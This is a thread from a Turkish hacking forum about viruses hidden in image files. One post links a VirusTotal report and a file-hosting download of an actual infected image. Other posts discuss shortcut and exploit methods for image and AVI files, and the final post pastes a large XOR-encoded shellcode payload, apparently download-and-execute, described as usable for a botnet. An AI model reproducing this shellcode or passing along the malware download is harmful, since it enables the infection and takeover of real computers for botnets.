Anlayana Resim Virüsü
-
- öncelikle şunu söyleyim söve söve gitmiştim ama bırakamadım burayı geri geldim :)
- operada karizmatik metin editörü gözükmediği için resimlerde sorun olursa birisi düzenlesin bi zahmet
- [IMG]http://i34.tinypic.com/2q0nbrb.jpg[/IMG]
- http://img227.imageshack.us/img227/8117/caps2t.jpg
- oluşturulması kısayol oluşturup dosyanın başına %windir% tarzında oluyor. şuan tam aklımda değil ancak ufak çaplı bir araştırmayla bulabilirsiniz.
- ve son olarak ( trojan tanındığı için böyle yoksa yöntem tanınmaz )
- http://www.virustotal.com/file-scan/report.html?id=094b1b62fdefa76e44f9521b90953b092ef91ba9bde174cbb94f7c325d7c1896-1281822622 NOT:
- RESİMİN LİNKİNİ VERİYORUM KENDİ BİLGİSAYARINIZDA DENEMEYİN SAKIN AÇMAYIN UYARIYORUM!
- http://www.multiupload.com/TSIOT89JAC
-
Edit:
Denemeye Çalışıcam Hocam Eyw.
-
bir açıklama daha
http://www.online-tech-tips.com/computer-tips/hide-file-in-picture/
-
1. madde çok sakıncalı hocam..
-
fatX bunu yazdı:
-----------------------------
1. madde çok sakıncalı hocam..
-----------------------------yok hocam madde temiz :)
olayı bilen bilir :)
-
ama jpg dosyası açıldığında eklenen exe veya herhangi bir dosya açılmıyor, önemli olan da bu :)
-
microsoft'un windows uptade sayfasını hackledikleri zaman bu yöntemi yine aynı sayfada paylaşmıştı koreli hackerlar, tabi o zaman google translate yoktu amk (korece yazmış puştlar) .
-
nasıl bi zarar veriyo bilen var mı
-
kısacası şöyle özetleyelim.
bu kodlar public yani senin benim elime geçecek kodlar değil şimdilik tabii :)
exploit ile yapılıyor yani bilinen yöntemler değil.
şu anda piyasada var ama dandik yöntemler kısayol oluşturma windir komutu falan :)
http://hackforums.net/showthread.php?tid=593183&page=1
burda avi ile yapılabildiğini söylemişler bu kodlar tabi biraz daha dandiği.
kısacası resim-müzik gibi dosyalardanda virüs bulaşabilir
-
doktor hoşgeldin :D
-
char shellcode[]=
"\xEB\x0F\x58\x80\x30\x17\x40\x81\x38\x6D\x30\x30\x21\x75\xF4"
"\xEB\x05\xE8\xEC\xFF\xFF\xFF\xFE\x94\x16\x17\x17\x4A\x42\x26"
"\xCC\x73\x9C\x14\x57\x84\x9C\x54\xE8\x57\x62\xEE\x9C\x44\x14"
"\x71\x26\xC5\x71\xAF\x17\x07\x71\x96\x2D\x5A\x4D\x63\x10\x3E"
"\xD5\xFE\xE5\xE8\xE8\xE8\x9E\xC4\x9C\x6D\x2B\x16\xC0\x14\x48"
"\x6F\x9C\x5C\x0F\x9C\x64\x37\x9C\x6C\x33\x16\xC1\x16\xC0\xEB"
"\xBA\x16\xC7\x81\x90\xEA\x46\x26\xDE\x97\xD6\x18\xE4\xB1\x65"
"\x1D\x81\x4E\x90\xEA\x63\x05\x50\x50\xF5\xF1\xA9\x18\x17\x17"
"\x17\x3E\xD9\x3E\xE0\xFE\xFF\xE8\xE8\xE8\x26\xD7\x71\x9C\x10"
"\xD6\xF7\x15\x9C\x64\x0B\x16\xC1\x16\xD1\xBA\x16\xC7\x9E\xD1"
"\x9E\xC0\x4A\x9A\x92\xB7\x17\x17\x17\x57\x97\x2F\x16\x62\xED"
"\xD1\x17\x17\x9A\x92\x0B\x17\x17\x17\x47\x40\xE8\xC1\x7F\x13"
"\x17\x17\x17\x7F\x17\x07\x17\x17\x7F\x68\x81\x8F\x17\x7F\x17"
"\x17\x17\x17\xE8\xC7\x9E\x92\x9A\x17\x17\x17\x9A\x92\x18\x17"
"\x17\x17\x47\x40\xE8\xC1\x40\x9A\x9A\x42\x17\x17\x17\x46\xE8"
"\xC7\x9E\xD0\x9A\x92\x4A\x17\x17\x17\x47\x40\xE8\xC1\x26\xDE"
"\x46\x46\x46\x46\x46\xE8\xC7\x9E\xD4\x9A\x92\x7C\x17\x17\x17"
"\x47\x40\xE8\xC1\x26\xDE\x46\x46\x46\x46\x9A\x82\xB6\x17\x17"
"\x17\x45\x44\xE8\xC7\x9E\xD4\x9A\x92\x6B\x17\x17\x17\x47\x40"
"\xE8\xC1\x9A\x9A\x86\x17\x17\x17\x46\x7F\x68\x81\x8F\x17\xE8"
"\xA2\x9A\x17\x17\x17\x44\xE8\xC7\x48\x9A\x92\x3E\x17\x17\x17"
"\x47\x40\xE8\xC1\x7F\x17\x17\x17\x17\x9A\x8A\x82\x17\x17\x17"
"\x44\xE8\xC7\x9E\xD4\x9A\x92\x26\x17\x17\x17\x47\x40\xE8\xC1"
"\xE8\xA2\x86\x17\x17\x17\xE8\xA2\x9A\x17\x17\x17\x44\xE8\xC7"
"\x9A\x92\x2E\x17\x17\x17\x47\x40\xE8\xC1\x44\xE8\xC7\x9A\x92"
"\x56\x17\x17\x17\x47\x40\xE8\xC1\x7F\x12\x17\x17\x17\x9A\x9A"
"\x82\x17\x17\x17\x46\xE8\xC7\x9A\x92\x5E\x17\x17\x17\x47\x40"
"\xE8\xC1\x7F\x17\x17\x17\x17\xE8\xC7\xFF\x6F\xE9\xE8\xE8\x50"
"\x72\x63\x47\x65\x78\x74\x56\x73\x73\x65\x72\x64\x64\x17\x5B"
"\x78\x76\x73\x5B\x7E\x75\x65\x76\x65\x6E\x56\x17\x41\x7E\x65"
"\x63\x62\x76\x7B\x56\x7B\x7B\x78\x74\x17\x48\x7B\x74\x65\x72"
"\x76\x63\x17\x48\x7B\x60\x65\x7E\x63\x72\x17\x48\x7B\x74\x7B"
"\x78\x64\x72\x17\x40\x7E\x79\x52\x6F\x72\x74\x17\x52\x6F\x7E"
"\x63\x47\x65\x78\x74\x72\x64\x64\x17\x40\x7E\x79\x5E\x79\x72"
"\x63\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x58\x67\x72\x79\x56"
"\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x58\x67\x72\x79\x42\x65"
"\x7B\x56\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x45\x72\x76\x73"
"\x51\x7E\x7B\x72\x17\x17\x17\x17\x17\x17\x17\x17\x17\x7A\x27"
"\x27\x39\x72\x6F\x72\x17"
"m00!";şu tarz bir giriş kısmı var bahsettiğin exploitin. genelde botnet amaçlı kullanılabilcek birşey :))